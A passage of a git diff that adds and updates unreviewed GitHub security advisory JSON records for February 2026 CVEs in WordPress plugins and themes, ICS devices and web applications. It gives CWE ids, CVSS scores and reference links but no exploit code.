"2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22351" + ], + "details": "Missing Authorization vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP FullCalendar: from n/a through <= 1.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22351" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-fullcalendar/vulnerability/wordpress-wp-fullcalendar-plugin-1-6-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6vfc-pv6m-f4jg/GHSA-6vfc-pv6m-f4jg.json b/advisories/unreviewed/2026/02/GHSA-6vfc-pv6m-f4jg/GHSA-6vfc-pv6m-f4jg.json index 22490fbb5c908..3c813c93a0a2e 100644 --- a/advisories/unreviewed/2026/02/GHSA-6vfc-pv6m-f4jg/GHSA-6vfc-pv6m-f4jg.json +++ b/advisories/unreviewed/2026/02/GHSA-6vfc-pv6m-f4jg/GHSA-6vfc-pv6m-f4jg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6vfc-pv6m-f4jg", - "modified": "2026-02-19T18:31:53Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:53Z", "aliases": [ "CVE-2026-25420" ], "details": "Missing Authorization vulnerability in MailerLite MailerLite official-mailerlite-sign-up-forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MailerLite: from n/a through <= 1.7.18.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:23Z" diff --git a/advisories/unreviewed/2026/02/GHSA-733c-qhrf-7cmm/GHSA-733c-qhrf-7cmm.json b/advisories/unreviewed/2026/02/GHSA-733c-qhrf-7cmm/GHSA-733c-qhrf-7cmm.json new file mode 100644 index 0000000000000..0922151bc195c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-733c-qhrf-7cmm/GHSA-733c-qhrf-7cmm.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-733c-qhrf-7cmm", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67981" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Besa besa allows PHP Local File Inclusion.This issue affects Besa: from n/a through <= 2.3.15.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67981" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/besa/vulnerability/wordpress-besa-theme-2-3-15-local-file-inclusion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-752x-86hx-w73c/GHSA-752x-86hx-w73c.json b/advisories/unreviewed/2026/02/GHSA-752x-86hx-w73c/GHSA-752x-86hx-w73c.json new file mode 100644 index 0000000000000..3fb7255f7d34d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-752x-86hx-w73c/GHSA-752x-86hx-w73c.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-752x-86hx-w73c", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22344" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes FiveStar fivestar allows PHP Local File Inclusion.This issue affects FiveStar: from n/a through <= 1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22344" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/fivestar/vulnerability/wordpress-fivestar-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7689-4fm5-8xxm/GHSA-7689-4fm5-8xxm.json b/advisories/unreviewed/2026/02/GHSA-7689-4fm5-8xxm/GHSA-7689-4fm5-8xxm.json new file mode 100644 index 0000000000000..067d08dfc2d2b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7689-4fm5-8xxm/GHSA-7689-4fm5-8xxm.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7689-4fm5-8xxm", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-25715" + ], + "details": "The web management interface of the device allows the administrator \nusername and password to be set to blank values. Once applied, the \ndevice permits authentication with empty credentials over the web \nmanagement interface and Telnet service. This effectively disables \nauthentication across all critical management channels, allowing any \nnetwork-adjacent attacker to gain full administrative control without \ncredentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25715" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-03.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-521" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json b/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json new file mode 100644 index 0000000000000..302d95675b37d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-76g3-wv5g-g883", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22352" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PersianScript Persian Woocommerce SMS persian-woocommerce-sms allows Reflected XSS.This issue affects Persian Woocommerce SMS: from n/a through <= 7.1.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22352" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/persian-woocommerce-sms/vulnerability/wordpress-persian-woocommerce-sms-plugin-7-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7cjr-h9q5-mgrf/GHSA-7cjr-h9q5-mgrf.json b/advisories/unreviewed/2026/02/GHSA-7cjr-h9q5-mgrf/GHSA-7cjr-h9q5-mgrf.json new file mode 100644 index 0000000000000..6a2dfd563f588 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7cjr-h9q5-mgrf/GHSA-7cjr-h9q5-mgrf.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7cjr-h9q5-mgrf", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68552" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WebCodingPlace WooCommerce Coming Soon Product with Countdown woo-coming-soon-product allows PHP Local File Inclusion.This issue affects WooCommerce Coming Soon Product with Countdown: from n/a through <= 5.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68552" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/woo-coming-soon-product/vulnerability/wordpress-woocommerce-coming-soon-product-with-countdown-plugin-5-0-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7f73-hx35-rw45/GHSA-7f73-hx35-rw45.json b/advisories/unreviewed/2026/02/GHSA-7f73-hx35-rw45/GHSA-7f73-hx35-rw45.json new file mode 100644 index 0000000000000..9b74274baea74 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7f73-hx35-rw45/GHSA-7f73-hx35-rw45.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7f73-hx35-rw45", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69400" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Yokoo yokoo allows PHP Local File Inclusion.This issue affects Yokoo: from n/a through <= 1.1.11.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69400" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/yokoo/vulnerability/wordpress-yokoo-theme-1-1-11-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7gx4-4vpm-w576/GHSA-7gx4-4vpm-w576.json b/advisories/unreviewed/2026/02/GHSA-7gx4-4vpm-w576/GHSA-7gx4-4vpm-w576.json new file mode 100644 index 0000000000000..92639415f48b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7gx4-4vpm-w576/GHSA-7gx4-4vpm-w576.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7gx4-4vpm-w576", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67992" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in LoftOcean PatioTime patiotime allows PHP Local File Inclusion.This issue affects PatioTime: from n/a through < 2.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67992" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/patiotime/vulnerability/wordpress-patiotime-theme-2-1-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json b/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json new file mode 100644 index 0000000000000..6622c4bdb5a04 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7qvf-m2xc-hg57", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24944" + ], + "details": "Missing Authorization vulnerability in weDevs Subscribe2 subscribe2 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Subscribe2: from n/a through <= 10.44.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24944" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/subscribe2/vulnerability/wordpress-subscribe2-plugin-10-44-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-82j5-hm8j-jwhq/GHSA-82j5-hm8j-jwhq.json b/advisories/unreviewed/2026/02/GHSA-82j5-hm8j-jwhq/GHSA-82j5-hm8j-jwhq.json new file mode 100644 index 0000000000000..8ca098153f849 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-82j5-hm8j-jwhq/GHSA-82j5-hm8j-jwhq.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-82j5-hm8j-jwhq", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24790" + ], + "details": "The underlying PLC of the device can be remotely influenced, without proper safeguards or authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24790" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-04.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-04" + }, + { + "type": "WEB", + "url": "https://www.welker.com/contact-us/welker-team" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json b/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json new file mode 100644 index 0000000000000..9822ee51db2cf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-877x-j2fm-2mw5", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69384" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdiscover Timeline Event History timeline-event-history allows Reflected XSS.This issue affects Timeline Event History: from n/a through <= 3.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69384" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/timeline-event-history/vulnerability/wordpress-timeline-event-history-plugin-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json b/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json new file mode 100644 index 0000000000000..2f1ee53565a26 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87jc-9r3r-58w8", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-27505" + ], + "details": "SVXportal version 2.5 and prior contain a stored cross-site scripting vulnerability in the user registration workflow (index.php submitting to admin/user_action.php). User-supplied fields such as Firstname, lastname, and email are stored in the backend database without adequate output encoding and are later rendered in the administrator interface (admin/users.php), allowing an unauthenticated remote attacker to inject arbitrary JavaScript that executes in an administrator's browser upon viewing the affected page.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27505" + }, + { + "type": "WEB", + "url": "https://github.com/sa2blv/SVXportal/blob/master/admin/user_action.php" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/svxportal-admin-user-action-php-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8c32-hp76-8f35/GHSA-8c32-hp76-8f35.json b/advisories/unreviewed/2026/02/GHSA-8c32-hp76-8f35/GHSA-8c32-hp76-8f35.json new file mode 100644 index 0000000000000..691cf7b26b566 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8c32-hp76-8f35/GHSA-8c32-hp76-8f35.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8c32-hp76-8f35", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69375" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in SolverWp Portfolio Builder swp-portfolio allows PHP Local File Inclusion.This issue affects Portfolio Builder: from n/a through <= 1.2.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69375" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/swp-portfolio/vulnerability/wordpress-portfolio-builder-plugin-1-2-5-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8f2p-qrq8-3vpg/GHSA-8f2p-qrq8-3vpg.json b/advisories/unreviewed/2026/02/GHSA-8f2p-qrq8-3vpg/GHSA-8f2p-qrq8-3vpg.json new file mode 100644 index 0000000000000..5cd5cb6a9cdf1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8f2p-qrq8-3vpg/GHSA-8f2p-qrq8-3vpg.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8f2p-qrq8-3vpg", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69376" + ], + "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vanquish User Extra Fields wp-user-extra-fields allows Path Traversal.This issue affects User Extra Fields: from n/a through <= 17.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69376" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-user-extra-fields/vulnerability/wordpress-user-extra-fields-plugin-17-0-arbitrary-file-deletion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8g2j-5xh3-r35m/GHSA-8g2j-5xh3-r35m.json b/advisories/unreviewed/2026/02/GHSA-8g2j-5xh3-r35m/GHSA-8g2j-5xh3-r35m.json index a5f3d335da3b9..88f0081adf4c5 100644 --- a/advisories/unreviewed/2026/02/GHSA-8g2j-5xh3-r35m/GHSA-8g2j-5xh3-r35m.json +++ b/advisories/unreviewed/2026/02/GHSA-8g2j-5xh3-r35m/GHSA-8g2j-5xh3-r35m.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8g2j-5xh3-r35m", - "modified": "2026-02-19T21:30:48Z", + "modified": "2026-02-20T18:31:32Z", "published": "2026-02-19T21:30:48Z", "aliases": [ "CVE-2026-27368" ], "details": "Missing Authorization vulnerability in SeedProd Coming Soon Page, Under Construction & Maintenance Mode by SeedProd coming-soon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Coming Soon Page, Under Construction & Maintenance Mode by SeedProd: from n/a through <= 6.19.7.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T21:18:33Z" diff --git a/advisories/unreviewed/2026/02/GHSA-8m92-8r47-wxqw/GHSA-8m92-8r47-wxqw.json b/advisories/unreviewed/2026/02/GHSA-8m92-8r47-wxqw/GHSA-8m92-8r47-wxqw.json new file mode 100644 index 0000000000000..8e1b034d443e5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8m92-8r47-wxqw/GHSA-8m92-8r47-wxqw.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8m92-8r47-wxqw", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2025-15582" + ], + "details": "A security flaw has been discovered in detronetdip E-commerce 1.0.0. The impacted element is the function Delete/Update of the component Product Management Module. Performing a manipulation of the argument ID results in authorization bypass. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15582" + }, + { + "type": "WEB", + "url": "https://github.com/detronetdip/E-commerce/issues/23" + }, + { + "type": "WEB", + "url": "https://github.com/Nixon-H/Ecommerce-IDOR-Product-Manipulation" + }, + { + "type": "WEB", + "url": "https://github.com/detronetdip/E-commerce" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346486" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346486" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754030" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json b/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json new file mode 100644 index 0000000000000..1e15d52fce9f8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8p6j-8fq8-23rr", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68880" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in peterwsterling Simple Archive Generator simple-archive-generator allows Reflected XSS.This issue affects Simple Archive Generator: from n/a through <= 5.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68880" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/simple-archive-generator/vulnerability/wordpress-simple-archive-generator-plugin-5-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json b/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json new file mode 100644 index 0000000000000..7a16e09527da0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8p85-wjp4-3w4m", + "modified": "2026-02-20T18:31:40Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26746" + ], + "details": "OpenSourcePOS 3.4.1 contains a Local File Inclusion (LFI) vulnerability in the Sales.php::getInvoice() function. An attacker can read arbitrary files on the web server by manipulating the Invoice Type configuration. This issue can be chained with the file upload functionality to achieve Remote Code Execution (RCE).", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26746" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/CVE-2026-26746/blob/main/CVE-2026-26746.md" + }, + { + "type": "WEB", + "url": "https://github.com/opensourcepos/opensourcepos" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json b/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json new file mode 100644 index 0000000000000..633222197720a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8x43-j6j7-q6vg", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26723" + ], + "details": "Cross Site Scripting vulnerability in Key Systems Inc Global Facilities Management Software v. 20230721a allows a remote attacker to execute arbitrary code via the function parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26723" + }, + { + "type": "WEB", + "url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2026-26723" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-97cw-r9qf-j9qh/GHSA-97cw-r9qf-j9qh.json b/advisories/unreviewed/2026/02/GHSA-97cw-r9qf-j9qh/GHSA-97cw-r9qf-j9qh.json index 72713145bb4ea..c492b5c604cbd 100644 --- a/advisories/unreviewed/2026/02/GHSA-97cw-r9qf-j9qh/GHSA-97cw-r9qf-j9qh.json +++ b/advisories/unreviewed/2026/02/GHSA-97cw-r9qf-j9qh/GHSA-97cw-r9qf-j9qh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-97cw-r9qf-j9qh", - "modified": "2026-02-19T18:31:51Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:51Z", "aliases": [ "CVE-2026-22422" ], "details": "Improper Neutralization of Script-Related HTML 